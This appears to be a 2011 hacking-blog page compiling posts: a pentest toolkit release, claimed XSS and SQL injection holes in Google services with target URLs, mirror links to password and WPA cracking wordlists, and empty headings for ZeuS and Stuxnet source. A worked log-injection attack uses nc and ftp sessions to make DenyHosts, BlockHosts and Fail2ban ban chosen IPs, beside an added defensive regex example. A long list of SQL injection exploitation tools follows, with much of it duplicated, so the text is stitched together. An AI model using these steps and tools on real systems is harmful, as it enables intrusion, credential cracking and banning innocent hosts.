Thursday, 30. June 2011
Inguma v.0.3 Linux
On Thursday, 30 Jun 2011, in topic 'Pentest'
A Free Penetration Testing And Vulnerability Research Toolkit
Inguma is a penetration testing toolkit written entirely in Python. The framework includes modules to discover hosts, gather information about them, fuzz targets, brute-force user names and passwords and, of course, exploits.
Some minor features added are:
- An icon has been added to graph nodes to show the OS of the target when available.
- New autosave feature that will save the KB after every module execution to prevent data loss in case of GUI crash. This autosaved KB will be loaded at startup if the user wants.
- Single host report option added to the node menu.
- Improved performance of ping and scan modules.
- More modules have been ported to the GUI, like "identify", which has also been added to the list of modules launched on adding a target.
- We are now closer to full Windows compatibility.
Download: http://www.inguma-framework.org/projects/inguma/files
Google Plus vulnerable to XSS
On Thursday, 30 Jun 2011, in topic 'Vulnerabilities'
pathric due found that the Google Plus application has a parameter that is vulnerable to XSS:
https://plus.google.com/up/start/?sw=1&type=st?p=XSS vuln parameter
http://din.gy./xLSlj
SQL Injection Vulnerability in Google Lab Database System
On Thursday, 30 Jun 2011, in topic 'Vulnerabilities'
Hackers released step-by-step proof of this vulnerability:
1. Website : www.googlelabs.com or labs.google.com
2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer
Video Download link: http://www.bdcyberarmy.com/Google/google_video.avi
Dictionaries & Wordlists
On Thursday, 30 Jun 2011, in topic 'Dictionaries & Wordlists'
Collection of Wordlist v.2 374806023
(3.9GB / 539MB) Part 1, Part 2, Part 3 5510122c3c27c97b2243208ec580cc67
http://thepiratebay.org/torrent/6300469/Collection_of_Wordlist_%28Dictionaries%29___V.2_NEW____for_Cracking_
http://www.mediafire.com/download.php?e5v4q79yf7d5r3a
http://www.mediafire.com/download.php?o8ri742gair8g6d
http://www.mediafire.com/download.php?7w695b1k1b1b903
HuegelCDC 53059218
(508MB / 64MB) Part 1 52f42b3088fcb508ddbe4427e8015be6
http://www.megaupload.com/?d=SNK18CU0
http://www.mediafire.com/?blvzrvqlrvrm0ny
Naxxatoe-Dict-Total-New 4239459985
(25GB / 1.1GB) Part 1, Part 2, Part 3
Part 4, Part 5, Part 6 e52d0651d742a7d8eafdb66283b75e12
http://diablohorn.wordpress.com/2010/03/21/gotta-love-compression/
http://www.mediafire.com/download.php?kvntczux7i5bo2c
http://www.mediafire.com/download.php?3czep4kxmso1kd7
http://www.mediafire.com/download.php?twdlv7tf9f0xbdg
http://www.mediafire.com/download.php?cct41buudrcy0ss
http://www.mediafire.com/download.php?6oakueb1vhg414x
http://www.mediafire.com/download.php?8v3f64p6pd349ix
Purehates Word list 165824917
(1.7GB / 250MB) Part 1, Part 2 c5dd37f2b3993df0b56a0d0eba5fd948
http://h33t.com/details.php?id=178f55c67ca0f522831dbc67042a34983e6652f5
http://www.mediafire.com/download.php?98u8d4qe803erm8
http://www.mediafire.com/download.php?dvi0bjbhxkn05hl
theargonlistver1 4865840
(52MB / 15MB) Part 1 b156e46eab541ee296d1be3206b0918d
http://www.mediafire.com/?fmz1q3nhnz0
http://www.mediafire.com/download.php?mwu8ivr0nqn5eeq
theargonlistver2 46428068
(297MB / 32MB) Part 1 41227b1698770ea95e96b15fd9b7fc6a
http://thepiratebay.org/torrent/3833663/The_Argon_list_ver.2_Password_dictionary_2.3gig_Jo-Psyko_
http://www.mediafire.com/download.php?ixcih9rgrczrpmj
theargonlistver2-v2 (word.lst.s.u.john.s.u.200) 244752784
(2.2GB / 219MB) Part 1, Part 2 36f47a35dd0d995c8703199a09513259
http://rapidshare.com/files/98912262/theargonlistver2_wordlist.zip.html
http://www.mediafire.com/download.php?yj31a3ic2zohai3
http://www.mediafire.com/download.php?x9ejmh9yp71dh8r
WordList Collection 472603140
(4.9GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 a76e7b1d80ae47909b5a0baa4c414194
http://www.torrentroom.com/torrent/3074471-WordList-Collection.html#b3
http://www.mediafire.com/download.php?mbu3mdl2mzi227h
http://www.mediafire.com/download.php?z3jjaq3pe384yvl
http://www.mediafire.com/download.php?wt7qqt57d4rp0kv
http://www.mediafire.com/download.php?8zglksb3k7b7746
http://www.mediafire.com/download.php?9yjzcprc76ats4g
http://www.mediafire.com/download.php?pxm1a3muicyrkyr
http://www.mediafire.com/download.php?98p2jdlph15a8b9
wordlist-final 8287890
(80MB / 19MB) Part 1 db2de90185af33b017b00424aaf85f77
http://torrentz.eu/87e820583d71a3bb7d43e2a3b1d4eb3d7231e606
http://www.mediafire.com/download.php?nb4j6b4p2c2f5kv
wordlists-sorted 65581967
(687MB / 168MB) Part 1 2537a72f729e660d87b4765621b8c4bc
http://diablohorn.tbhost.eu/distribute/wordlists-sorted.gz.torrent
http://www.mediafire.com/download.php?6356dax1xi6c2ct
wpalist 37520637
(422MB / 66MB) Part 1 9cb032c0efc41f2b377147bf53745fd5
http://www.megaupload.com/?d=7RN6ZB2E
WPA-PSK WORDLIST (40 MB) 2829412
(32MB / 8.7MB) Part 1 de45bf21e85b7175cabb6e41c509a787
http://thepiratebay.org/torrent/4428301/
http://www.mediafire.com/download.php?ko3k5waryr254gq
WPA-PSK WORDLIST 2 (107 MB) 5062241
(55MB / 15MB) Part 1 684c5552b307b4c9e4f6eed86208c991
http://thepiratebay.org/torrent/4433853/WPA-PSK_WORDLIST_2_%28107_MB%29.rar
http://www.mediafire.com/download.php?ccdqo2s6ar75320
WPA-PSK WORDLIST 3 Final (13 GB) 611419293
(6.8GB / 1.4GB) Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 58747c6dea104a48016a1fbc97942c14
http://thepiratebay.org/torrent/5945498/WPA-PSK_WORDLIST_3_Final_%2813_GB%29.rar
http://www.mediafire.com/download.php?beyf2gbs07wl6zn
http://www.mediafire.com/download.php?scc21q07rdaamzd
http://www.mediafire.com/download.php?urcrd1lk1bjts1e
http://www.mediafire.com/download.php?k74hl5ud35ytzzv
http://www.mediafire.com/download.php?yras8iih4739hlt
http://www.mediafire.com/download.php?e8ycntc5qnsxbnn
http://www.mediafire.com/download.php?i7apnn6rgpal937
-=Xploitz=- Vol 1 - PASSWORD DVD 100944487
(906MB / 109MB) Part 1 38eae1054a07cb894ca5587b279e39e4
http://thepiratebay.org/torrent/4017231/
http://www.mediafire.com/download.php?pjs2s64pj0uw66f
-=Xploitz=- Vol 2 - Master Password Collection 87565344
(1.1GB / 158MB) Part 1 53f0546151fc2c74c8f19a54f9c17099
http://www.backtrack-linux.org/forums/old-general-discussion/8603-=xploitz=-2-master-password-collections.html
http://www.mediafire.com/download.php?n3ofy96p5lbkvr3
-=Xploitz Pirates=- Masters Password Collection #1! -- Optimized 79523622
(937MB / 134MB) Part 1 6dd2c32321161739563d0e428f5362f4
http://thepiratebay.org/torrent/5079163
http://www.mediafire.com/download.php?rjqlmfkokn5fpzq
17-in-1 5341231112
(37GB / 4.5GB) Part 1 - Part 24 d1f8abd4cb16d2280efb34998d41f604
http://www.mediafire.com/?k3j1ngab1bg3m
18-in-1 5343814622
(37GB / 4.5GB) Part 1 - Part 24 aee6d1a230fdad3b514a02eb07a95226
http://www.mediafire.com/?t150bv7govzsr
18-in-1 [WPA Edition] 1130701596
(12.6GB / 2.9GB) Part 1 - Part 15
425d47c549232b62dbb0e71b8394e9d9
http://www.mediafire.com/?lpkepzdz3mmg0
36GB wordlist that can be very useful for cracking accounts.
After compression, it's "only" 723MB.
http://www.megaupload.com/?d=7ZLNVV8D
Openwall Wordlists Collection CD
Included in this collection are wordlists for 20+ human languages and lists of common passwords. The included languages are: Afrikaans, Croatian, Czech, Danish, Dutch, English, Finnish, French, German, Hungarian, Italian, Japanese, Latin, Norwegian, Polish, Russian, Spanish, Swahili, Swedish, Turkish, and Yiddish. There's also a list of the common passwords and unique words for all the languages combined in one file (over 40 MB for almost 4 million entries).
http://www.megaupload.com/?d=Y5OPKI21
It has ~1 Billion WPA optimized passwords.
http://thepiratebay.org/torrent/5945498/WPA-PSK_WORDLIST_3_Final_(13_GB).rar
Here is the list of 1,717,681 passwords:
http://dazzlepod.com/site_media/txt/passwords.txt
UNIQPASS Free 2 million randomly selected passwords (18.9MB).
http://dazzlepod.com/site_media/txt/uniqpass_preview.txt
1.5GB_Wordlist_by_MAsH
http://svn.isdpodcast.com/wordlists/1.5GB_Wordlist_by_MAsH.txt.tar.gz
1 Password dictionaries
2 Leaked passwords
2.1 Statistics
3 Miscellaneous non-hacking dictionaries
3.1 Facebook lists
http://www.skullsecurity.org/wiki/index.php/Passwords
ZeuS Source Code
On Thursday, 30 Jun 2011, in topic 'Source Code'
Stuxnet Decompiled Source code Dump
On Thursday, 30 Jun 2011, in topic 'Source Code'
Vulnerable programs
On Thursday, 30 Jun 2011, in topic 'Vulnerabilities'
We used DenyHosts on our previous example, because it is one of the most famous tools out there, but it is not the only one vulnerable.
BlockHosts latest version (2.0.3) is also vulnerable to log injection via the vsftp and SSH logs. The reason is the same as DenyHosts: loose regular expressions.
root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): lala] FAIL LOGIN: Client "2.3.4.54"
..
(looking at the logs)
Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client "2.3.4.54" ] FAIL LOGIN: Client "192.168.3.1"
If we pass a modified user name in order to inject an IP address, BlockHosts will block the fake supplied IP address instead of the valid one.
root@slacker:~# cat /etc/hosts.deny
#---- BlockHosts Additions
ALL: 2.3.4.54 : deny
..
#---- BlockHosts Additions
With the SSH logs, the issue is the same as with DenyHosts. If we inject any data in the protocol identification field, BlockHosts will parse our fake IP address instead of the valid one (the exploit for DenyHosts will work with BlockHosts with just a slight change, left as a reader exercise).
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
sshd[123]: User myself from 1.5.6.7 not allowed
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification 'sshd[123]: User myself from 1.5.6.7 not allowed ' from 10.1.1.14
root@slacker:~# cat /etc/hosts.deny
#---- BlockHosts Additions
ALL: 1.5.6.7 : deny
..
#---- BlockHosts Additions
*BlockHosts author, Avinash Chopde, has released a patch for it.
Fail2ban's latest version (0.8) is vulnerable to the same injection via SSH logs as DenyHosts and BlockHosts. It looks for "ROOT LOGIN REFUSED" anywhere in the logs and, as previously shown, we can easily inject that using the bad protocol identification message from ssh.
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
ROOT LOGIN REFUSED hi FROM 1.5.6.7
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification 'ROOT LOGIN REFUSED hi FROM 1.5.6.7 ' from 10.1.1.14
*Fail2ban author, Cyril Jaquier, has released a patch for it.
**This issue is similar to CVE-2006-6302, but using a different vector. Thanks to Cyril Jaquier for pointing it out to me.
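An added example (not from the original post, nor code from DenyHosts, BlockHosts or Fail2ban) that runs the log lines shown above through a search-anywhere match and through a match anchored to the parts of the line the daemon itself writes. The regular expressions are simplified assumptions, not the tools' real or patched expressions, and the benign line is constructed.

```python
import re

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
# Syslog prefix written by syslogd/sshd, not by the remote client.
SSHD = r"^\w{3} +\d{1,2} [\d:]{8} \S+ sshd\[\d+\]: "
VSFTPD = r"^\w{3} \w{3} +\d{1,2} [\d:]{8} \d{4} \[pid \d+\] "

# Loose: the phrase may appear anywhere, including inside client-supplied text.
# Assumed stand-ins for "loose regular expressions".
LOOSE = [
    re.compile(r"User \S+ from " + IP + r" not allowed"),
    re.compile(r"ROOT LOGIN REFUSED.* FROM " + IP),
    re.compile(r'FAIL LOGIN: Client "' + IP + r'"'),
]

# Anchored: the message must start right after the daemon prefix and the
# address must be the one the daemon appends at the very end of the line.
STRICT = [
    re.compile(SSHD + r"User \S+ from " + IP + r" not allowed$"),
    re.compile(SSHD + r"ROOT LOGIN REFUSED FROM " + IP + r"$"),
    re.compile(SSHD + r"Bad protocol version identification '.*' from " + IP + r"$"),
    re.compile(VSFTPD + r'\[.*\] FAIL LOGIN: Client "' + IP + r'"$'),
]

# Log lines as shown in the post (with the straight quotes the daemons write).
SSH_USER_INJECTED = ("Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version "
                     "identification 'sshd[123]: User myself from 1.5.6.7 "
                     "not allowed ' from 10.1.1.14")
SSH_ROOT_INJECTED = ("Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version "
                     "identification 'ROOT LOGIN REFUSED hi FROM 1.5.6.7 ' "
                     "from 10.1.1.14")
FTP_INJECTED = ('Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client '
                '"2.3.4.54" ] FAIL LOGIN: Client "192.168.3.1"')
# Constructed benign line: a genuine rejected login, no injection.
SSH_GENUINE = "Jun 4 14:50:01 slacker sshd[4160]: User myself from 10.1.1.14 not allowed"


def offender(line, patterns):
    """Return the address the given pattern set would block, or None."""
    line = line.rstrip("\n")
    for pattern in patterns:
        match = pattern.search(line)
        if match:
            return match.group(1)
    return None


def hosts_deny(lines, patterns):
    """Build the hosts.deny entries that would result from these log lines."""
    ips = {offender(line, patterns) for line in lines}
    return sorted("ALL: %s : deny" % ip for ip in ips if ip)


if __name__ == "__main__":
    samples = [SSH_USER_INJECTED, SSH_ROOT_INJECTED, FTP_INJECTED, SSH_GENUINE]
    for line in samples:
        print("loose=%-12s strict=%-12s %s" % (
            offender(line, LOOSE), offender(line, STRICT), line[:60]))
    print(hosts_deny(samples, STRICT))
```

With the anchored set, every injected line resolves to the connecting address the daemon appended, so the spoofed addresses never reach hosts.deny.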
SQL Injection Scanners List
On Thursday, 30 Jun 2011, in topic 'Pentest'
WebRaider
The idea of this attack is very simple: getting a reverse shell from an SQL injection with one request, without using an extra channel such as TFTP or FTP to upload the initial payload.
Download
http://code.google.com/p/webraider/downloads/list
Download PDF
http://www.mavitunasecurity.com/s/research/OneClickOwnage.pdf
Havij Advanced SQL Injection
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. With this software, a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system.
What makes Havij different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.
The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.
e.g.
Havij v1.14
http://www.itsecteam.com/files/havij/Havij1.14Free.rar
Download Help (pdf format)
http://www.itsecteam.com/files/havij/havij_help-english.pdf
Download Help (chm format)
http://www.itsecteam.com/files/havij/havij_help-english.chm
Pangolin free edition released
Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool
for Website manager or IT Security analyst. Its goal is to detect and take
advantage of SQL injection vulnerabilities on web applications. Once it detects
one or more SQL injections on the target host, the user can choose among a
variety of options to perform an extensive back-end database management system
fingerprint, retrieve DBMS session user and database, enumerate users, password
hashes, privileges, databases, dump entire or users specific DBMS
tables/columns, run his own SQL statement, read specific files on the file
system and more.
Test many types of databases
Your web applications using Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3, Sybase?
Pangolin supports all of them.
Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall
setting, Injection Digger, Data dumper, etc.
Download:
http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip
SQLIer
SQLIer takes an SQL Injection vulnerable URL and attempts to determine all the necessary information to build and exploit an SQL Injection hole by itself, requiring no user interaction at all (unless it can't guess the table/field names correctly). By doing so, SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites.
An 8 character password (containing any character from decimal ASCII code 1-127) takes approximately 1 minute to crack.
Download:
http://bcable.net/releases.php?sqlier
SQID
SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the following operations: look for SQL injection in web pages and test submit forms for possible SQL injection vulnerabilities.
Download:
http://sqid.rubyforge.org/#download
FG-Injector Framework
FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation.
Download:
http://sourceforge.net/projects/injection-fwk/files/
Safe3 Sql Injector
Features:
Full support for http, https website.
Full support for Basic, Digest, NTLM http authentications.
Full support for GET, Post, Cookie sql injection.
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
Powerful AI engine to automatically recognize the injection type, the database type and the best way to perform the SQL injection.
Support to enumerate databases, tables, columns and data.
Support to read, list and write any file from the database server's underlying file system when the database software is MySQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is Oracle or Microsoft SQL Server.
Support for IP domain query, web path guess, MD5 crack etc.
Support for sql injection scan.
Download:
http://sourceforge.net/projects/safe3si/files/Safe3SI-8.1.rar/download
Sqlninja
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
.Linux
.FreeBSD
.Mac OS X
It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:
.ICMP-based shell
.CVE-2010-0232 support to escalate the sqlsrvr.exe process to SYSTEM (greetz Tavis)
.Header-based injection support
Download:
http://sqlninja.sourceforge.net/download.html
Sqlmap
is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.
Download
http://sqlmap.sourceforge.net/#download
Download Gui-for-sqlmap
http://code.google.com/p/gui-for-sqlmap/downloads/list
SQL Power Injector
is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page.
Supports: Microsoft SQL Server, Oracle, MySQL, Sybase / Adaptive Server and DB2.
Download
http://www.sqlpowerinjector.com/download.htm
Absinthe
is a gui-based tool that automates the process of downloading the schema & contents of a database that is vulnerable to Blind SQL Injection.
Absinthe does not aid in the discovery of SQL Injection holes. This tool will only speed up the process of data recovery.
Supports: Microsoft SQL Server, MSDE, Oracle, and Postgres.
Download
http://www.0x90.org/releases/absinthe/download.php
bsqlbf-v2:
This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle
Download
http://code.google.com/p/bsqlbf-v2/downloads/list
Marathon Tool
Marathon Tool is a POC for using heavy queries to perform a Time-Based Blind SQL Injection attack. This tool is still work in progress but is right now in a very good alpha version to extract information from web applications using Microsoft SQL Server, Microsoft Access, MySQL or Oracle Databases.
Download
http://marathontool.codeplex.com/#
pysqlin
Pysqlin is a console python tool to exploit SQL Injection vulnerabilities. It has 3 main adaptable components via a plugin framework:
Plugin: Adds functionality to the main program.
Injector: Provides injection methods.
Filter: Allows to modify the final http request and DDBB query in order to perform any kind of transformation.
Implemented: Oracle, MySQL and Microsoft SQL Server.
Download
http://code.google.com/p/pysqlin/source/checkout
BSQL Hacker
BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database
Implemented: Oracle and Microsoft SQL Server.
Available experimental support for MySQL.
Download
http://labs.portcullis.co.uk/application/bsql-hacker/
sqlsus
sqlsus is an open source MySQL injection and takeover tool, written in perl.
Supports only MySQL.
Download
http://sqlsus.sourceforge.net/download.html
DarkMySQLi16.py
SQL injection tool by rsauron, written in Python
Download
http://www.multiupload.com/NV6T2XOI1A
Source
darkc0de Crew
SQL TOOL
This is an auto SQL injection Tool. Supports MySQL & MsSQL. The Old SQL Tool will no longer be supported.
Download
http://sourceforge.net/projects/sqltool/files/SQL%20Tool.rar/download?_test=goal
mySQLenum
is a command line automatic blind sql injection tool for web application that uses MySql server as its back-end. Its main goal is to provide an easy to use command line interface.
Supports only MySQL
Download
http://sourceforge.net/projects/mysqlenum/files/mysqlenum-0.3.tar.gz/download?_test=goal
PRIAMOS
is a powerful SQL Injector & Scanner
You can search for SQL Injection vulnerabilities and inject vulnerable strings to get all databases, tables and column data with the injector module.
Supports only Microsoft SQL Server.
Download
http://www.priamos-project.com/versions.htm
SFX-SQLi
Supports only Microsoft SQL Server.
Download
http://www.kachakil.com/default.htm
yInjector
yInjector is a MySQL Injection penetration tool
Supports only MySQL.
Download
http://y-osirys.com/softwares/s-softwares/id10#subsec=s-softwares,id=10,title=yInjector%20-%20SQL%20Inj%20Penetration%20Tool
Bobcat
is a tool to aid a security consultant in taking full advantage of SQL injection vulnerabilities. It was originally created to build and extend upon the capabilities of a tool named "Data Thief".
Download
http://www.northern-monkee.co.uk/pub/bobcat.html
ExploitMyUnion
is a tool written in Python with a PyQt user interface made to automate sql injection exploitation.
Download
http://sourceforge.net/projects/exploitmyunion/files/v2.x/exploitmyunion-2.1_win32.zip/download?_test=goal
Laudanum
is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found, and available in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.
Download
http://sourceforge.net/projects/laudanum/files/laudanum-0.2/laudanum-0.2.tar.gz/download?_test=goal
Hexjector
is an open source, cross-platform PHP script to automate site pentests for SQL Injection vulnerabilities.
Download
http://sourceforge.net/projects/hexjector/files/Hexjector%20%28Win32%29/Hexjector%20v1.0.7.4.zip/download?_test=goal
Toolza
UTF-8 Perl script
SQL injection DBs supported: Mysql, Mssql, Sybase, Postgresql, Access, Oracle, Firebird/Interbase
Includes blind Mysql injection + alternative methods
Download
http://pastebin.com/QJ1MMiux
aidsql - Linux
Is a PHP application provided for detecting security holes in your website/s. It's a modular application, meaning that you can develop your very own plugins for SQL injection detection & exploitation.
Download
http://code.google.c.../downloads/list
The Mole
The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.
Tutorial
http://themole.sourceforge.net/?q=tutorial
Download
http://sourceforge.net/projects/themole/files/themole-0.2.6/themole-0.2.6-win32.zip/download
http://sourceforge.net/projects/themole/files/themole-0.2.6/themole-0.2.6-lin-src.tar.gz/download
NTO SQL Invader
NTO SQL Invader gives the ability to quickly and easily exploit or demonstrate SQL Injection vulnerabilities in Web applications. With a few simple clicks, you will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database.
Download
http://go.ntobjectives.com/
FatCat Auto SQL Injector
This is an automatic SQL injection tool called FatCat. Use FatCat to test your web application and exploit it more deeply. FatCat's features help you extract database, table and column information from a web application, but only if it is vulnerable to SQL injection.
Requirement:
PHP Version 5.3.0
Enable file_get_function
Video
http://dl.dropbox.com/u/18007092/FatCat.swf
Download
http://code.google.com/p/fatcat-sql-injector/downloads/list
SQLol v.....
SQLol is a configurable SQL injection testbed. SQLol allows
you to exploit SQL injection flaws, but furthermore allows
a large amount of control over the manifestation of the flaw.
Options:
Type of query
Location within query
Type and level of sanitization
Level of query output
Verbosity of error messages
Visibility of query
Injection string entry point
Other cool things:
Reset button
Challenges
Support for multiple database systems
Download
https://github.com/SpiderLabs/SQLol/downloads
Enema
Enema is not autohacking software. It is a dynamic tool for people who know what to do. Old database versions (e.g. MySQL 4.x) are not supported. Development is targeted at modern versions.
Features:
Multi-platform.
User-friendly graphical interface.
Multithreaded.
Dump.
Customise your queries
Plugins to automate attacks
Supported for today:
POST, GET, Cookies
MSSQL >=2000 and MySQL>=5.0
Injection methods supported:
Error based injection.
Union based injection (using subquery).
Blind Time-based MSSQL(waitfor), MySQL(sleep)
Download
http://code.google.com/p/enema/downloads/list
SQLI Hunter: SQL Injection Hunter
“SQLI Hunter” SQL Injection Hunter 1.0: as the name makes clear, this application is used to find websites that are vulnerable to SQL Injection attacks. It comes with 4493 dorks and returns 96 results in a single scan. It also includes an admin login page finder.
Download
http://adf.ly/313683/http://www.mediafire.com/download.php?pvvp3jx23fps750
Portable
http://adf.ly/313683/http://www.mediafire.com/?qe646an7woqbcmo
sqlifuzzer
sqlifuzzer is a command line scanner that seeks to identify SQL injection vulnerabilities. It parses Burp logs to create a list of fuzzable requests... then fuzzes them.
Download
http://code.google.com/p/sqlifuzzer/downloads/list
sqlcake
Automatic database dump and interactive SQL shell tool: it dumps the current database structure, including tables and columns, and turns into an interactive MySQL prompt with extra features.
- sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.
- sqlcake offers a few useful functions to gather database information easily by sql injection usage.
- sqlcake also allows you to bypass magic quotes, dump tables and columns and gives you the possibility to run an interactive MySQL shell.
- sqlcake supports union stacked queries for real fast processing and blind injections with logarithmic techniques for saving time.
Download
http://sourceforge.net/projects/sqlcake/files/
The idea of this attack is very simple: getting a reverse shell from an SQL injection with one request, without using an extra channel such as TFTP or FTP to upload the initial payload.
Download
http://code.google.com/p/webraider/downloads/list
Download PDF
http://www.mavitunasecurity.com/s/research/OneClickOwnage.pdf
Havij Advanced SQL Injection
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. With this software, a user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system.
What makes Havij different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.
The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.
e.g.
Havij v1.14
http://www.itsecteam.com/files/havij/Havij1.14Free.rar
Download Help (pdf format)
http://www.itsecteam.com/files/havij/havij_help-english.pdf
Download Help (chm format)
http://www.itsecteam.com/files/havij/havij_help-english.chm
Pangolin free edition released
Pangolin is an automatic SQL injection penetration testing (Pen-testing) tool
for Website manager or IT Security analyst. Its goal is to detect and take
advantage of SQL injection vulnerabilities on web applications. Once it detects
one or more SQL injections on the target host, the user can choose among a
variety of options to perform an extensive back-end database management system
fingerprint, retrieve DBMS session user and database, enumerate users, password
hashes, privileges, databases, dump entire or users specific DBMS
tables/columns, run his own SQL statement, read specific files on the file
system and more.
Test many types of databases
Are your web applications using Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, Sqlite3 or Sybase?
Pangolin supports all of them.
Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall
setting, Injection Digger, Data dumper, etc.
Download:
http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip
SQLIer
SQLIer takes an SQL Injection vulnerable URL and attempts to determine all the necessary information to build and exploit an SQL Injection hole by itself, requiring no user interaction at all (unless it can't guess the table/field names correctly). By doing so, SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites.
An 8 character password (containing any character from decimal ASCII code 1-127) takes approximately 1 minute to crack.
Download:
http://bcable.net/releases.php?sqlier
SQID
SQL Injection digger (SQID) is a command line program that looks for SQL injections and common errors in websites. It can perform the following operations: look for SQL injection in web pages and test submit forms for possible SQL injection vulnerabilities.
Download:
http://sqid.rubyforge.org/#download
FG-Injector Framework
FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation.
Download:
http://sourceforge.net/projects/injection-fwk/files/
Safe3 Sql Injector
Features:
Full support for http, https website.
Full support for Basic, Digest, NTLM http authentications.
Full support for GET, Post, Cookie sql injection.
Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
Powerful AI engine to automatically recognize the injection type, the database type and the best SQL injection method.
Support to enumerate databases, tables, columns and data.
Support to read, list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server.
Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
Support for IP domain query, web path guessing, MD5 cracking etc.
Support for sql injection scan.
Download:
http://sourceforge.net/projects/safe3si/files/Safe3SI-8.1.rar/download
Sqlninja
Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:
- Linux
- FreeBSD
- Mac OS X
It is basically an official release with all the new features that have been in the SVN for a while (most of them for almost 1 year, ouch). More specifically:
- ICMP-based shell
- CVE-2010-0232 support to escalate the sqlsrvr.exe process to SYSTEM (greetz Tavis)
- Header-based injection support
Download:
http://sqlninja.sourceforge.net/download.html
Sqlmap
is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.
Download
